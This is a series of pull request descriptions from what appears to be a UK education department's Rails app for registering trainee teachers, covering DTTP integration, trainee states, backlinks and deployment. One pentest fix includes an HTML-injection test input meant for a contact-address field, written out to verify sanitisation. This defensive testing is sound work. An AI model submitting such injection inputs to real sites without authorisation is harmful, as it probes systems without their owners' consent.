- With a non-draft trainee, check the the confirm pages do not have the checkbox, and that pressing continue still works.

[825] Remove checkbox from confirm page for non-draft trainees

---

app/components/feedback_link/view.html.erb
app/components/feedback_link/view.rb
app/views/trainees/outcome_details/recommended.html.erb
app/views/trn_submissions/show.html.erb
config/settings.yml
spec/components/feedback_link/view_preview.rb
spec/components/feedback_link/view_spec.rb

A link to a google form where users can leave feedback. 
- Add feature flag for feedback link.
- Add feature flag component.
- Add setting for feature flag URL.
- Boot up the server.
- Select a trainee in a `draft` state and fill out all the details.
- Click `Submit record and request TRN`.
- Check that the feedback link directs to the google form.
- Select a trainee in a `QTS recommended` state.
- Click `Recommend for QTS`, then `Today` and `Recommend for QTS`.
- Check that the feedback link is there.
- In `settings.yml` change `enable_feedback_link:` to `false`
- Check that the link no longer appears on both pages

[719] Add feedback link component

---

app/components/trainees/record_actions/view.html.erb
app/components/trainees/record_actions/view.rb
config/locales/en.yml
spec/components/trainees/record_actions/view_spec.rb
spec/features/trainees/recording_training_outcome_spec.rb

https://trello.com/c/YbJYFLUV/722-s-conditionally-render-the-recommend-for-qts-action-bar
This PR adds more conditional checks to the record actions component based on the trainee's state.
As per the prototype, the following rules should apply:
| Trainee status      | Record actions LHS             | Record actions RHS   |
|---------------------|--------------------------------|----------------------|
| Draft               | N/A                            | N/A                  |
| submitted_for_trn   | “This record is pending a TRN” | Defer / Withdraw     |
| trn_received        | "Recommend for QTS" button     | Defer / Withdraw     |
| recommended_for_qts | No action bar                  | No action bar        |
| withdrawn           | No action bar                  | No action bar …

[722] Conditionally show trainee status and QTS button

---

lib/tasks/example_data.rake
spec/factories/trainees.rb

`trn_received` and `submitted_for_trn` should not have outcome date
Don't add the outcome date to trainees without a TRN
- Run `bundle exec rake example_data:generate`
- Data without a TRN i.e. `submitted_for_trn` and `trn_received` should not have placement information

[781] Don't create placement data for new trainees

---

.github/workflows/deploy.yml

At the moment, deployment continues, even after a smoke test failure
Stop deployment on smoke Test failure
Add smoke test check condition in deploy workflow

Stop deployment on smoke Test failure

---

app/components/personas/view.html.erb
app/models/user.rb
app/policies/trainee_policy.rb
config/initializers/personas.rb
db/migrate/20210112121519_add_system_admin_boolean_to_users.rb
db/schema.rb
lib/tasks/example_data.rake
spec/factories/degrees.rb
spec/factories/users.rb
spec/models/user_spec.rb
spec/policies/trainee_policy_spec.rb

https://trello.com/c/u11n8lEG/707-m-systemadmin-role
- Add boolean column `admin` to  users table
- Update `TraineePolicy::Scope` to use `User#system_admin?`
- Update rake task `example_data:generate` to set one persona as admin
**Keeping it very simple for now until we get requirements to build a multi-role system.**
- Run `rake db:migrate:reset db:seed example_data:generate`
- Visit http://0.0.0.0:3000/personas
- Choose "Admin" persona
- You should be able to see all trainees
- Click on any trainee and you should be able to view and edit

[707] Allow users to become an admin to view and edit all trainees

---

app/forms/programme_detail_form.rb
config/locales/en.yml
spec/forms/programme_detail_form_spec.rb

https://trello.com/c/bg1ryDrd/829-year-3000-accepted-for-programme-end-date
https://trello.com/c/Jm5kHZl3/828-would-expect-both-of-these-to-throw-errors-for-invalid-dates
* Add validation to check for any programme end date more than 5 years in future and more than than 10 years in past
* Add validation to check for any programme start date more than 1 year in future
* Add tests to form spec
Test programme details validations on new/existing record

[829] Programme Details validations bugs

---

.github/workflows/smoke-test.yml
.rspec
Gemfile
spec/rails_helper.rb
spec/smoke/health_check_spec.rb
spec/spec_helper.rb
spec/spec_helper_smoke.rb

This also involves configuring ruby
Make check-in files available during Smoke-Test and create a suitable ruby environment
Make check-in files available during Smoke-Test and create a suitable ruby environment

Make check-in files available during Smoke-Test

---

.github/workflows/smoke-test.yml

- Removes the dynamic bundling of `httpparty` from the smoke test step as it's already in Gemfile

Remove http party in smoke test bundling as it's already in Gemfile

---

app/components/start_page_banner/view.html.erb
app/controllers/pages_controller.rb
app/controllers/sessions_controller.rb
app/views/pages/home.html.erb
config/routes.rb
spec/components/start_page_banner/view_spec.rb
spec/controllers/sessions_controller_spec.rb
spec/features/authentication_spec.rb

Homepage for the Register app. The user should be directed to this page when they login.
- Add `home` method to `pages_controller`
- Add new default endpoint `/home`, after sign in 
- Create homepage
- Change links on index page
- Pull down the code and boot up the server
- Open the app and check that when you log in it redirects to /home
- Check the content is correct and the links work
- The `Check what data you need` link will need to be changed to `data_requirements_path` once [this](https://github.com/DFE-Digital/register-trainee-teachers/pull/386) PR is merged into master. < **DONE**

[834] Homepage

---

app/presenters/dttp/trainee_presenter.rb
spec/presenters/dttp/trainee_presenter_spec.rb

- https://trello.com/c/WN03X3qr/814-handle-sending-other-and-not-provided-gender-options-to-dttp
- Builds on this PR https://github.com/DFE-Digital/register-trainee-teachers/pull/355
- This PR sets up the work to send the trainee gender values properly to DTTP
- The not provided option is currently mapped to the "other" value as we don't have the codeset for this option. This will be updated once we have the codeset. 
- Complete a trainee and submit for TRN
- Assert the submission is still successful

[814] - Handle sending "other" and "not provided" gender options to DTTP

---

app/lib/dttp/batch_request.rb
spec/lib/dttp/batch_request_spec.rb

We raise a BatchRequest::Error when a batch job fails. DTTP returns an
empty body in some error conditions and it's difficult to diagnose the
issue. This will help.
* Add status and headers to the BatchRequest::Error
The ticket is concerned with clearing the sidekiq queues following an incident. There are only jobs left in the retry sets which I want to preserve so as I can diagnose what is wrong with them. Hopefully this PR will help.

[849] Add HTTP status and headers to error

---

app/components/trainees/confirmation/diversity/view.rb
app/controllers/trainees/diversity/disability_disclosures_controller.rb
app/controllers/trainees_controller.rb
app/models/trainee.rb
app/presenters/dttp/trainee_presenter.rb
app/services/diversities/disability_disclosures/update.rb
config/initializers/diversity_enums.rb
spec/components/trainees/confirmation/diversity/view_preview.rb
spec/components/trainees/confirmation/diversity/view_spec.rb
spec/features/trainees/diversities/edit_disability_disclosure_spec.rb
spec/forms/diversities/form_validator_spec.rb
spec/models/trainee_spec.rb
spec/presenters/dttp/trainee_presenter_spec.rb
spec/services/diversities/disability_disclosures/update_spec.rb

Enums create a negative scope by prepending `not_` to the enum value. Creating an enum with `not_` as the prefix when there is also a non 'not' version causes a warning that it will overwrite the scope.
* Rename `not_disabled` to `no_disability` in `Trainee`
* Remove `is_not_draft` and `is_draft` and use the enum generated versions

[872] fix scope warnings

---

app/views/trainees/personal_details/edit.html.erb

The gender option had the options in the wrong order.
I'm not sure what `link_errors` was for, but assumed it should be on the first option so moved it across.

Change order of options to match prototype and Apply

---

Gemfile
Gemfile.lock
app/jobs/retrieve_trn_job.rb
app/models/state_transition_error.rb
app/models/trainee.rb
app/services/dttp/recommend_for_qts.rb
app/services/dttp/register_for_trn.rb
spec/models/trainee/state_transitions_spec.rb
spec/services/dttp/recommend_for_qts_spec.rb

https://trello.com/c/bFXIiWcp/838-s-state-transitions
This PR adds state transitions to Trainees:
- Adds stateful enum to the trainee model for managing trainee state https://github.com/amatsuda/stateful_enum, defining allowed transitions.
- Adds custom methods for `update_and_submitt_for_trn!` and `update_and_receive_trn!` on the trainee model, since there are associated updates that need to happen alongside these state transitions.
Calls the state transition methods for transitioning to:
- `submitted_for_trn`
- `trn_received`
- `recommended_for_qts`

[838] Add state transitions for trainee

---

app/components/header/view.html.erb
app/components/navigation_bar/view.html.erb
app/components/navigation_bar/view.rb
app/views/layouts/application.html.erb
app/webpacker/styles/application.scss
config/locales/en.yml
spec/components/navigation_bar/view_preview.rb
spec/components/navigation_bar/view_spec.rb
spec/support/page_objects/trainees/diversities/disability_disclosure.rb

Add a navigation bar which is only visible to users that have signed in. The dynamic blue line underneath the links will be part of a separate PR.
- Add navigation bar component
- Add logic to make navigation bar only present if signed in
- Add links on navigation bar
- Extend blue bar to full page
- Fix flakey test
- Boot up the server
- Check that the navigation bar is not visible before signing in
- Sign in and check the navigation bar is always present
- Check the links on the navigation bar work (the bulk actions page is not ready yet)

[866] Add navigation bar

---

README.md

This is to help users (developers etc) set space roles, ssh and launch rails console on PaaS.
Add PaaS app interaction documentations to REAME file
Update REAME file with link to confluence page, which describes how to interact with the apps on PaaS platform. This includes how to set roles, ssh and launch rails consoles etc.

Add PaaS app interaction instruction to REAME file

---

app/components/flash_banner/view.html.erb
app/components/flash_banner/view.rb
app/components/notification_banner/view.rb
app/views/layouts/application.html.erb
spec/components/flash_banner/view_spec.rb
spec/components/notification_banner/view_spec.rb
spec/features/trainees/diversities/edit_disabilities_spec.rb
spec/features/trainees/diversities/edit_disability_disclosure_spec.rb
spec/features/trainees/diversities/edit_disclosure_spec.rb
spec/features/trainees/edit_contact_details_spec.rb
spec/features/trainees/edit_personal_details_spec.rb
spec/features/trainees/edit_programme_details_spec.rb
spec/features/trainees/edit_trainee_record_spec.rb

https://trello.com/c/7UKKp2tp/827-flash-messages-should-not-appear-when-making-most-changes-on-draft-records
- Update `FlashBanner::View` to only display flash messages if the trainee is in a non-draft state - the only exception is deleting degrees.
- Remove flash message assertions in some feature files as it's no longer applicable
- Visit a draft trainee pageand make various changes. Expect to see no flash messages unless you delete a degree.
- Visit a non-draft trainee page and any changes made will cause a flash message to be displayed

[827] Add display logic for flash messages

---

app/components/trainees/timeline/view.html.erb
app/components/trainees/timeline/view.rb
config/locales/en.yml
spec/components/trainees/timeline/view_preview.rb
spec/components/trainees/timeline/view_spec.rb

https://trello.com/c/CqbL1jQ7/846-l-add-audited-events-to-timeline-component
Pulls events from the audit log for trainees onto the timeline.
Notes:
- The 'Record created' timeline entry is now being pulled from the audit log (rather than the `created_at` timestamp) so that we can grab the user who created it.
- We _could_ fallback on the `created_at` timestamp if there's no audit, but there should always be an audit going forward.
- Because all the trainee transitions happen in background jobs there will be no user in the audits i.e. we don't know who kicked off the job.
- We could track this by passing the `current_user` to the bg job and then 'comment' the audit, but this is probably out of scope for this ticket.
- For now, I'm falling back on the provider's name.
**If you have trainees …

[846] Add audited events to timeline

---

app/components/navigation_bar/view.html.erb
app/components/navigation_bar/view.rb
app/controllers/application_controller.rb
app/helpers/navigation_helper.rb
app/views/layouts/application.html.erb
spec/components/navigation_bar/view_spec.rb

We have a nav bar. It has links. They need a blue bar under them if they're active.
Add active link styling when the page is current or the link is explicitly marked as current. This allows us to underline 'Trainees' for all trainee pages.

[888] active section for navigation bar

---

app/components/dynamic_back_link/view.html.erb
app/components/dynamic_back_link/view.rb
app/controllers/concerns/breadcrumbable.rb
app/controllers/trainees/confirm_details_controller.rb
app/controllers/trainees/personal_details_controller.rb
app/controllers/trainees/review_draft_controller.rb
app/controllers/trainees_controller.rb
app/views/trainees/confirm_details/show.html.erb
app/views/trainees/training_details/edit.html.erb
spec/components/dynamic_back_link/view_spec.rb
spec/controllers/trainees/personal_details_controller_spec.rb
spec/controllers/trainees_controller_spec.rb

https://trello.com/c/UTN91Fxw/812-spike-work-out-the-back-link-functionality
https://trello.com/c/JRnNQEKZ/803-back-links-from-confirm-pages-return-to-the-confirm-page
This PR explores creating dynamic backlinks by storing 'origin pages' in the user's session.
- There are currently many different **origin pages** from which a user can start an **edit journey**
- The first backlink, and the one on the confirm page for that journey (itself a possible origin page), should link to the **origin page**
- However, since these edit journeys are spread across multiple steps, we need a way of 'remembering' where the user came from.
- The user starts from a **first origin** page
- They go through the edit journey [backlink to **first origin**]
- They arrives on the confirm page **second origin** …

[812] & [803] Backlinks architecture & confirm pages backlinks

---

lib/tasks/example_data.rake
spec/factories/providers.rb

The example data for nationalities wasn't using existing records. It is now.
Disabilities seem to be fine as long as the db/seed is run before example data.
* Sample nationalities instead of creating new ones
* Remove the `dttp_id` setting from the factory. We're not making it required currently and don't use it in the tests. We don't want it in the example data either.
NB. Will reset your local DB.
* `rake db:schema:load`
* `rake db:seed`
* `rake example_data:generate`

[808] Example data nationalities and disabilities are broken

---

app/controllers/trainees/degrees_controller.rb
app/models/concerns/sluggable.rb
app/models/degree.rb
app/models/trainee.rb
db/migrate/20210120140220_add_slug_to_degrees.rb
db/migrate/20210120140234_regenerate_slugs_on_degrees.rb
db/migrate/20210120140248_change_slug_nullability_on_degrees.rb
db/schema.rb
spec/factories/degrees.rb
spec/features/trainees/degrees/editing_degree_spec.rb
spec/models/degree_spec.rb
spec/models/trainee_spec.rb

- https://trello.com/c/bVWfzF3w/886-add-slugs-to-degrees
- Build on the work done in this PR https://github.com/DFE-Digital/register-trainee-teachers/pull/405/files to add slugs to degrees
- Note, we've taken out the immutability changes out of this PR and will add to a separate PR right after this one. This is so we can run the migrations to set existing records which may be in the QA environment then enforce the readonly mode in subsequent PR otherwise the data changes in the migrations in this PR won't change anything.

[886] Implement slugs on degrees

---

app/models/concerns/sluggable.rb
spec/models/degree_spec.rb
spec/models/trainee_spec.rb

- https://trello.com/c/qb2yJcYO/891-make-slugs-immutable
- Makes the slug field readonly mode once it's been set
- Fire up the rails console and load an existing trainee with a slug
- Run `#regenerate_slug` on the trainee/degree
- Reload and assert the old slug is still present

[891] Enforce readonly mode on the slug field once set

---

app/components/dynamic_back_link/view.html.erb
app/components/dynamic_back_link/view.rb
app/controllers/trainees/check_details_controller.rb
app/controllers/trainees/diversity/confirm_details_controller.rb
app/views/trainees/check_details/show.html.erb
app/views/trainees/contact_details/edit.html.erb
app/views/trainees/diversity/confirm_details/show.html.erb
app/views/trainees/diversity/disclosures/edit.html.erb
app/views/trainees/personal_details/edit.html.erb
app/views/trainees/programme_details/edit.html.erb
spec/features/trainees/submit_for_trn_spec.rb

https://trello.com/c/o7I1BbDF/804-back-links-from-trainee-review-page-return-to-the-review-page
This PR makes the `/check-details` route an origin page, so it's saved in the session every time a user lands on it.
It also adds the dynamic links to all first pages of edit flows, so they return to the correct origin.
**Not included**
- Backlinks in degree section
**Review draft**
- Navigate to a draft trainee's `/review-draft` page.
- Click through into each edit flow
- Check that the backlinks go to `/review-draft`
- Click through to a confirm page for one edit flow
- Check that the backlink goes to `/review-draft`
- Click 'change' on the confirm page
- Check that the backlink goes to `/confirm`
- Check that the backlink on the confirm page now _still_ goes back to `/review-draft`
**Check …

[804] Add backlinks for all edit flows

---

Gemfile
Gemfile.lock
app/components/start_page_banner/view.html.erb
app/controllers/pages_controller.rb
app/controllers/sessions_controller.rb
app/views/layouts/application.html.erb
config/routes.rb
spec/controllers/pages_controller_spec.rb
spec/controllers/sessions_controller_spec.rb
spec/factories/degrees.rb
spec/features/authentication_spec.rb
spec/features/view_pages_spec.rb

If a user signed in and navigates to `/` manually, they would get to the start page and be able to see the navigation bar. They should not be able to get to this page if they are signed in. 
This PR dynamically allows the root path to be the start page if the user is not logged in, or the homepage if the user is logged in.
- Replace `show` page controller method with `start` for consistency and to fix a bug.
- Add logic to render home page if logged in and navigate to start page.
- Navigate to https://rtt-review-pr-418.herokuapp.com
- Sign in
- Navigate to the root path, i.e `/` and ensure you are taken to the home page
- Sign out and repeat, ensure you are taken to the start page this time.

[892] Renders home page if signed in user navigates to start page

---

app/controllers/concerns/breadcrumbable.rb
app/views/trainees/degrees/edit.html.erb
app/views/trainees/degrees/new.html.erb
app/views/trainees/degrees/type/new.html.erb

https://trello.com/c/eTexcpKI/806-add-back-links-to-the-degrees-section
Adds missing backlinks to the trainee degree pages using the new `DynamicBackLink` component.
The backlinks at the start of a flow should go back to the origin page you came from.
The backlinks mid flow should return to the previous step.

[806] Add backlinks to degrees

---

app/lib/dttp/batch_request.rb
spec/lib/dttp/batch_request_spec.rb

When we create a `Dttp::BatchRequest` we need to add an extra header value. The existing code was passing this in which overwrote the default values set in `Dttp::Client`.
Merge the extra value with the default values and pass them to ensure that the access token is included.
This is a bit tricky to run locally so we can test on QA if the code looks ok. 
If you're feeling particularly adventurous.
* Get the id of a Contact that is a `dfe_portaluser` from DTTP.
* Get the id of the Account that they are associated with (the value in `_dfe_contacttypeid_value`)
* Create a provider and set their `dttp_id` to the account ID.
* Add a user belonging to that provider and set their `dttp_id` to the contact ID.
* Create a trainee that is ready to submit and associated with the provider.
* In the …

[899] Fix Dttp::BatchRequest headers

---

terraform/modules/paas/data.tf

As part of the consolidation on other dfe services into PaaS,
there is the need rename the PaaS org name from "dfe-teacher-services" to "dfe"
As part of the consolidation on other dfe services into PaaS,
there is the need rename the PaaS org name from "dfe-teacher-services" to "dfe"
data cloudfoundry_org org {
name = "dfe"
}

Update PaaS org name to dfe

---

app/controllers/concerns/basic_authenticable.rb
config/settings.yml
config/settings/development.yml
config/settings/production.yml
config/settings/staging.yml
config/settings/test.yml

* Make the basic_auth setting a feature flag
* Remove basic_auth from staging and production
Signin is enabled in these environments now so we no longer need basic
authentication

[xxx] Disable basic auth

---

app/controllers/trainees/confirm_deferrals_controller.rb
app/jobs/defer_job.rb
app/lib/dttp/code_sets/statuses.rb
app/lib/dttp/mappable.rb
app/services/dttp/defer.rb
spec/controllers/trainees/confirm_deferrals_controller_spec.rb
spec/services/dttp/defer_spec.rb

https://trello.com/c/JbM6e46P/841-defer-on-dttp
This PR builds upon the work completed in this spike: https://github.com/DFE-Digital/register-trainee-teachers/pull/423
It includes:
- A `DeferJob`, called from the `ConfirmDeferralsController`, which queues up a:
- `Dttp::Defer` service, which:
- Makes a `patch` call to DTTP to set the trainee status to deferred
- Internally transitions our trainee to 'deferred' on success
- Tests for the above
Guidance for checking the call to DTTP can be found in this original PR: https://github.com/DFE-Digital/register-trainee-teachers/pull/423

[841] Defer a trainee

---

app/components/trainees/confirmation/contact_details/view.rb
spec/components/trainees/confirmation/contact_details/view_spec.rb

- Sanitize user input field on contact details address.
- This was one of the pentest fixes
- Display HTML escape version of the text instead of the actual version
- Pull down the code
- Inject html into the contact details address form for example:
`<a href="https://fidusinfosec.com/">html-injection</a>`
- Check that the link is not rendered.

[842] Sanitize user input field on contact details

---

config/settings.yml
config/settings/development.yml
config/settings/qa.yml
config/settings/review.yml
config/settings/staging.yml

- We don't want the live feedback form in non production environments.
- Update development, qa, review and staging with a new setting for a non live feedback link.
- Use the review app to check that feedback link on the home page has non-live in the title: https://rtt-review-pr-421.herokuapp.com/

[857] - Change feedback links in non production environments

---

app/components/dynamic_back_link/view.rb
app/controllers/concerns/breadcrumbable.rb
app/controllers/trainees/confirm_details_controller.rb
app/controllers/trainees_controller.rb
app/lib/origin_page.rb
spec/components/dynamic_back_link/view_spec.rb
spec/features/trainees/degrees/adding_degree_spec.rb
spec/features/trainees/diversities/edit_disabilities_spec.rb
spec/features/trainees/diversities/edit_disability_disclosure_spec.rb
spec/features/trainees/diversities/edit_disclosure_spec.rb
spec/features/trainees/edit_contact_details_spec.rb
spec/features/trainees/edit_personal_details_spec.rb
spec/features/trainees/edit_programme_details_spec.rb
spec/features/trainees/edit_training_details_spec.rb
spec/lib/origin_page_spec.rb
spec/support/features/trainee_steps.rb

https://trello.com/c/lrgavNan/853-l-return-to-origin-page-after-completing-an-edit-workflow
- Extracted the origin page logic from `DynamicBackLink::View` into a reusable object (`OriginPage`) so we can use it in the `Trainees::ConfirmDetailsController`
- Updated some feature specs to reflect the new behaviour
- Fire up the app locally and confirm the behaviour matches the requirements outlined in the card

[853] Return to origin page after completing an edit workflow

---

Gemfile
config/settings/pen.yml

We are going to use the pentest environment for an accessibility audit. This configures the environment for basic auth and personas.
* Enable persona login
* Enable basic_auth

[932] Enable personas in pentest

---

app/controllers/trainees/qts_recommendations_controller.rb
app/jobs/retrieve_qts_job.rb
app/jobs/retrieve_trn_job.rb
app/models/trainee.rb
app/services/dttp/retrieve_qts.rb
config/settings.yml
db/migrate/20210126154122_add_recommended_for_qts_at_to_trainees.rb
db/schema.rb
spec/config/settings_spec.rb
spec/controllers/trainees/qts_recommendations_controller_spec.rb
spec/factories/trainees.rb
spec/jobs/retrieve_qts_job_spec.rb
spec/services/dttp/retrieve_qts_spec.rb

https://trello.com/c/RtpR8Q8G/924-m-fetch-qts-status-once-submitted
This PR includes:
- A `RetrieveQts` service that requests the `dfe_qtsawardflag` for a trainee from DTTP.
- A job `RetrieveQtsJob` that kicks off this service, polling every 6 hours for 2 days.
- A new column `recommended_for_qts_at` on trainees so we can use this to decide whether to continue polling

[924] Fetch QTS status

---

app/components/personas/view.html.erb
app/views/pages/home.html.erb
app/views/trainees/index.html.erb

https://trello.com/c/PCgfXi1m/929-s-hide-add-trainee-button-for-system-admins
* Conditional to hide add a trainee buttons for admin user. Fix typo.
Sign in as admin and non-admin persona to verify that button is hidden/showing

[929] Add logic to hide button for admin persona

---

app/lib/dttp/odata_parser.rb
app/services/dttp/register_for_trn.rb
db/migrate/20210127104805_add_dttp_id_to_degrees.rb
db/schema.rb
spec/factories/degrees.rb
spec/lib/dttp/odata_parser_spec.rb
spec/services/dttp/register_for_trn_spec.rb

https://trello.com/c/16qjBAbg/936-s-store-a-reference-to-the-dttp-degree-ids-when-a-trainee-is-submitted
- New migration file to add `dttp_id` field to degrees table
- Changed the data struture returned by `Dttp::OdataParser.entity_ids` to make it easier for `Dttp::RegisterForTrn` to find the DTTP ID for a particular degree
- Updated `Dttp::RegisterForTrn` to save the DTTP ID for each degree after batch request is finished
Try it out manually (make sure to comment out line 49 in `Dttp::Params::Contact` because we don't have a valid DTTP ID for the provider created via FactoryBot)
```ruby
trainee = FactoryBot.create(:trainee,
:with_programme_details,
:diversity_disclosed,
:with_placement_assignment) …
```

[936] Store a reference to the DTTP degree IDs when TRN is requested

---

app/controllers/trainees/confirm_details_controller.rb
app/lib/origin_page.rb
spec/lib/origin_page_spec.rb

This should fix:
https://trello.com/c/f0961xZm/943-draft-records-return-to-the-review-draft-page
https://trello.com/c/yXhZznPL/945-confirm-pages-are-sometimes-submitting-and-redirecting-to-themselves
https://trello.com/c/lk0HGw8q/948-edits-from-the-check-details-page-are-redirected-to-review-draft
https://trello.com/c/nPcqvdkl/949-recently-submitted-records-sometimes-return-to-the-review-draft-page
As discovered in https://github.com/DFE-Digital/register-trainee-teachers/pull/443 , this is how the `origin_pages` array is currently being built:
```
1. visit review_draft_trainee
origin_pages = [review_draft_trainee]
2. click the Personal details link and end up at the confirmation
origin_pages = [review_draft_trainee, confirm_personal_details]
3. submit and return to review
origin_pages = …
```

[943] Fix origin page bug when returning to same origin page

---

app/controllers/trainees/confirm_details_controller.rb
app/controllers/trainees/diversity/confirm_details_controller.rb
app/controllers/trainees/diversity/disability_details_controller.rb
app/controllers/trainees/diversity/disability_disclosures_controller.rb
app/controllers/trainees/diversity/disclosures_controller.rb
app/helpers/confirm_details_helper.rb
app/views/trainees/diversity/confirm_details/show.html.erb
app/views/trainees/review_draft/show.html.erb
config/locales/en.yml
config/routes.rb
spec/features/trainees/diversities/edit_disabilities_spec.rb
spec/features/trainees/diversities/edit_disability_disclosure_spec.rb
spec/features/trainees/diversities/edit_disclosure_spec.rb
spec/support/page_objects/trainees/diversities/confirm_details.rb

For the diversity flow, we have three different rails paths, which use the same controller and render the same page.
This is an issue for backlinks if you start from one diversity confirm page and end up on another, e.g.:
```
1. visit review_draft_trainee, with a trainee with a completed diversity section
origin_pages = [review_draft_trainee]
2. click the Diversity details link and you're immediately take to a confirmation
origin_pages = [review_draft_trainee, trainee_diversity_disclosure_confirm]
3. click change, complete the flow and you end up on a different confirmation!
origin_pages = [trainee_diversity_disclosure_confirm, trainee_diversity_disability_disclosure_confirm] <- this is where it's going wrong!
4. click continue and you're stuck in a loop
origin_pages = …
```

Fix bug with diversity confirmation routing

---

app/controllers/trainees_controller.rb
spec/features/trainees/creating_a_new_trainee_spec.rb

When adding a new trainee the form redirects to `Trainees#show`. It should redirect to review draft.
Update the path to redirect to the correct place.
Add a trainee. The first submit goes to review draft.

[954] Add trainee form redirect

---

app/controllers/trainees/confirm_deferrals_controller.rb
app/controllers/trainees/qts_recommendations_controller.rb
app/controllers/trn_submissions_controller.rb
app/models/trainee.rb
app/services/dttp/defer.rb
app/services/dttp/recommend_for_qts.rb
spec/controllers/trainees/confirm_deferrals_controller_spec.rb
spec/controllers/trainees/qts_recommendations_controller_spec.rb
spec/controllers/trn_submissions_controller_spec.rb
spec/features/trainees/recommending_for_qts_spec.rb
spec/models/trainee/state_transitions_spec.rb
spec/services/dttp/defer_spec.rb
spec/services/dttp/register_for_trn_spec.rb

- https://trello.com/c/7OwDOpJw/923-m-make-state-transitions-when-jobs-are-queued
- Set a few of the state transitions before their jobs are queued (bubble them up outside of the services)
This was mainly a refactor, no actual product changes were implemented.

[923] Make state transitions when jobs are queued

---

app/controllers/trainees/confirm_withdrawals_controller.rb
app/jobs/withdraw_job.rb
app/services/dttp/withdraw.rb
spec/controllers/trainees/confirm_withdrawals_controller_spec.rb
spec/services/dttp/withdraw_spec.rb

This PR builds from @gpeng 's draft PR #432 , so should be reviewed once we're happy with the changes there.
https://trello.com/c/2qKHILWU/840-withdraw-on-dttp
This PR includes:
- A `WithdrawJob`, called from the `ConfirmWithdrawalsController`, which queues up a:
- `Dttp::Withdraw` service, which makes a `patch` call to DTTP to set the trainee status to `deferred`
- I haven't transferred the trainee internally to `withdrawn` since the architecture for this is being decided in a separate ticket (when we move all state transitions out of jobs).

[840] Withdraw a trainee on DTTP

---

app/components/header/view.html.erb
app/components/header/view.rb
app/components/provider_card/script.js
app/components/provider_card/style.scss
app/components/provider_card/view.html.erb
app/components/provider_card/view.rb
app/controllers/sessions_controller.rb
app/controllers/system_admin/providers_controller.rb
app/models/provider.rb
app/policies/provider_policy.rb
app/views/layouts/platform_admin.html.erb
app/views/system_admin/providers/index.html.erb
app/views/system_admin/providers/new.html.erb
app/views/system_admin/providers/show.html.erb
config/locales/en.yml
config/routes.rb
lib/tasks/example_data.rake
spec/components/provider_card/view_preview.rb
spec/factories/providers.rb
spec/features/providers/creating_a_new_provider_spec.rb
spec/features/providers/viewing_providers_spec.rb
spec/models/provider_spec.rb
spec/policies/provider_policy_spec.rb
spec/support/page_objects/providers/index.rb
spec/support/page_objects/providers/new.rb
spec/support/page_objects/sections/provider_card.rb

https://trello.com/c/VDJ1ZLMM/930-m-basic-ui-for-adding-providers
This PR includes:
- A providers index page, listing all providers and links to their (empty) show pages
- A link to add a new provider
- A new provider page with basic form
- A `ProviderPolicy` that restricts all routes to system admins
- A link in the nav bar to 'Platform admin' that shows only for system admins
- A platform admin layout
Plus: A Very Basic Design!
**Firstly:**
- Sign in as a system admin
- Click on the 'Platform admin' link in the nav bar
- Check the providers are listed correctly
- Click the button 'Add a provider'
- Fill out the form
- Check validations
- Check that a new provider is created
**Secondly:**
- Sign in as a non-system admin
- Check that the link in the nav bar is hidden
- Check that you …

[924] Adding and listing providers

---

app/views/layouts/application.html.erb

The mailto links on the phase banner do not work. This is the fix. 
- Fix link in phase banner using helper method
- Fix link in footer using helper method
- Add subject to both
- Pull down the code
- Check the link feedback link in the phase banner works and the subject is what it should be.
- Do the same for the support link in the footer.

[967] Fix mailto feedback links

---

app/views/sign_in/index.html.erb

Fix `mail_to` link on Sign in page

[967] Fix mailto link on sign in page

---

app/controllers/application_controller.rb
app/controllers/trainees/check_details_controller.rb
app/controllers/trainees/personal_details_controller.rb
app/controllers/trainees/review_draft_controller.rb
app/controllers/trainees_controller.rb
spec/controllers/trainees/check_details_controller_spec.rb
spec/controllers/trainees/confirm_deferrals_controller_spec.rb
spec/controllers/trainees/confirm_withdrawals_controller_spec.rb
spec/controllers/trainees/personal_details_controller_spec.rb
spec/controllers/trainees/qts_recommendations_controller_spec.rb
spec/controllers/trainees/review_draft_controller_spec.rb
spec/controllers/trainees_controller_spec.rb
spec/controllers/trn_submissions_controller_spec.rb
spec/features/trainees/edit_trainee_id_spec.rb
spec/features/trainees/edit_trainee_record_spec.rb

https://trello.com/c/hw8lwrsd/952-add-redirects-for-draft-non-draft-trainees
This PR:
1. Redirects non-draft trainees away from draft trainee origin pages (`/review-draft` and `/check-details`)
2. Redirects draft trainees away from the non-draft trainee origin pages (`trainee/:slug` and `/personal-details`)
- Choose a non-draft trainee and check that accessing `/review-draft` and `/check-details` redirects you to the trainee show page
- Choose a draft trainee and check that accessing `trainee/:slug` and `/personal-details` redirects you to the `/review-draft` page

[952] Add redirects for draft/non-draft trainees

---

app/lib/dttp/params/placement_assignment.rb
spec/lib/dttp/params/placement_assignment_spec.rb

We send parameters to DTTP that trigger an export process to DQT. One of the fields that we were sending actually prevents the record from being picked up by the export 'scribe' process as it should be set by part of this process.
* remove `dfe_sendforregistrationdate" from the placement assignment  params. This field is set internally in DTTP when the record is added to the TTR1 file for export to DQT.
I've run this locally against dev and it works without error and doesn't set the field. This will be run through a production test today so just needs a code review.

[980] Don't send registration date

---

config/locales/en.yml

Change tab title on the accessibility page
- Edited the locale
Go to the accessibility page and check the title on the tab reads `Accessibility statement`

[977] Change accessibility tab title

---

app/views/trainees/new.html.erb

Content changes to the Add trainee page
- Add a trainee 
- Check that it only displays `Assessment only`
- Check that it displays `What type of training are they doing?`

[984] Change assessment only AO to assessment only

---

app/views/trainees/degrees/_non_uk_degree_form.html.erb
app/views/trainees/degrees/_uk_degree_form.html.erb

https://trello.com/c/XokiUBIz/981-add-a-line-of-content-to-hint-text
Added line to both uk and non uk degree partials

[981] Add line of content to degree partials

---

terraform/modules/paas/main.tf
terraform/modules/paas/variables.tf
terraform/terraform.tf
terraform/variables.tf

When the workerApp is deployed, it does not always refelect changes
such as enviroment variables etc; even if the underlying docker image
appears to be updated.
When the workerApp is deployed, it does not always refelect changes
such as enviroment variables etc; even if the underlying docker image
add `strategy = var.web_app_deployment_strategy` to worker app terraform resource settings

Add blue\green deployment strategy to worker app

---

app/jobs/queue_trainee_updates_job.rb
app/models/trainee.rb
app/services/dttp/contact_update.rb
db/migrate/20210201230107_add_dttp_update_sha_to_trainees.rb
db/schema.rb
spec/jobs/queue_trainee_updates_job_spec.rb
spec/models/trainee_spec.rb

- https://trello.com/c/yRo0UWI2/926-m-queue-updates-to-dttp
This PR builds upon https://github.com/DFE-Digital/register-trainee-teachers/pull/459, to implement a way to prevent re-syncs if a trainee has already been updated with dttp.
